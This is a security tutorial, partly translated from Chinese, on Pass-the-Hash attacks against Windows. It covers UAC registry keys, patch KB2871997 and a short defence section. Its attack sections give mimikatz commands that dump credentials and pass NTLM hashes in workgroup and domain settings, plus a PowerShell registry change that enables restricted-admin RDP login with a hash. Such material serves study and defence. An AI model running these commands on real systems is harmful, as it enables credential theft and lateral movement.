PTH(Pass The Hash) 攻击

1 概述

After obtaining the password NTLM of the local administrator group member account of a host, there is no need to crack the password clear text. Use PTH method to inject the administrator account and NTLM into the current session as credentials. Use this credentials to penetrate and obtain the management permissions of the surrounding hosts.

The other host must have the same account and be a member of the administrator group

In Windows NT 5.x system, the network login of the administrator group account can obtain system management rights

In Windows NT 6.x and later, network login for administrator group (SID not 500) accounts cannot obtain system management permissions, and network login for administrator (SID 500) accounts can obtain system management rights.

This type of attack is suitable for:

Domain/Work Group Environment

You can obtain hash, but the conditions do not allow the hash to be blasted

The same password exists in the intranet as the current machine

2 UAC

User Account Control is a new set of infrastructure technologies in Windows Vista (and later versions of operating systems) that can help prevent malicious programs (sometimes called 'malware') from corruption of systems, while also helping organizations deploy more manageable platforms.

With UAC, applications and tasks always run in the security context of non-administrator accounts, except when administrators specifically grant administrator-level access to the system. UAC prevents automatic installation of unauthorized applications from being installed, preventing unintentional changes to system settings.

User Account Control (UAC) is the core security feature of the new version of Windows and one of its most often misunderstood security features.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken, UAC is determined by the above registry key value, and the default setting is 0. If set to 1, administrators with SID 500 cannot obtain high permissions through network login.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy. If there is this key value in the registry and is set to 1, all management group members can obtain high permissions through the network login. And control the value of FilterAdministratorToken in the above table entry.

3 攻击

The pth function of mimikatz requires local administrator permissions, which is determined by its implementation mechanism. Information about the high-permission process lsass.exe is required first.

For 8.1/2012r2, install patch KB2871997 on Win 7/2008r2/8/2012, you can use AES keys instead of NT hash

Use mimikatz to get hash: first

1

2

privilege:debug

sekurlsa:logonpasswords

After getting the hash

3.1 工作组

1

sekurlsa:pth /user:administrator /domain:workgroup /ntlm:ccef208c6485269c20db2cad21734fe7

Microsoft also patched pth, but in the test, it was found that after patching, the regular Pass The Hash could no longer succeed, except for the default Administrator (SID 500) account. Using this account, you can still use Pass The Hash remote IPC connection.

3.2 域内用户

The premise is: the domain user is a member of the local management group

1

sekurlsa:pth /user:eviluser /domain:adsec.com /ntlm:ccef208c6485269c20db2cad21734fe7

Users within the domain are not affected by patches.

4 KB2871997

Changes to this feature include: prevent network logon and remote interactive logon to domain-join ed machine using local accounts…

After installing the KB2871997 patch, there are not many changes in other aspects. The patch will add a S-1-5-113 SID to the local account and a S-1-5-114 SID to the local account in the management group, so that it is convenient for management through domain policies, such as completely prohibiting network login for such accounts from the domain policies.

5 针对 RDP 的 hash 传递攻击

Speaking of hash pass attack (pth), I think that the general ones are psexec wce mimikatz and other direct execution commands.

This section introduces a method to use mimikatz + NThash to start mstsc.exe to achieve remote login to the Windows desktop, which is of great help to environments where commands cannot be executed and passwords cannot be cracked.

The principle (condition) is that remote targets need to use Restricted Admin Mode, because this mode supports kerberos authentication, you can use hash to log in.

1

sekurlsa:pth /user:user name /domain:domain name /ntlm:the user's ntlm hash /run:'mstsc.exe /restrictedadmin'

If the restricted management mode is disabled, use the following command to enable it:

1

mimikatz.exe 'sekurlsa:pth /user:user name /domain:domain name /ntlm:the user's ntlm hash /run:powershell.exe'

Modify the registry in the pop-up powershell window:

1

2

Enter-PSSession -Computer Target

New-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name 'DisableRestrictedAdmin' -Value '0' -PropertyType DWORD -Force

6 防御

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken, one of the system has Admin ApprovalMode. UAC is judged by the above registry key value, and the default setting is 0. If set to 1, administrators with SID 500 cannot obtain high permissions through network login.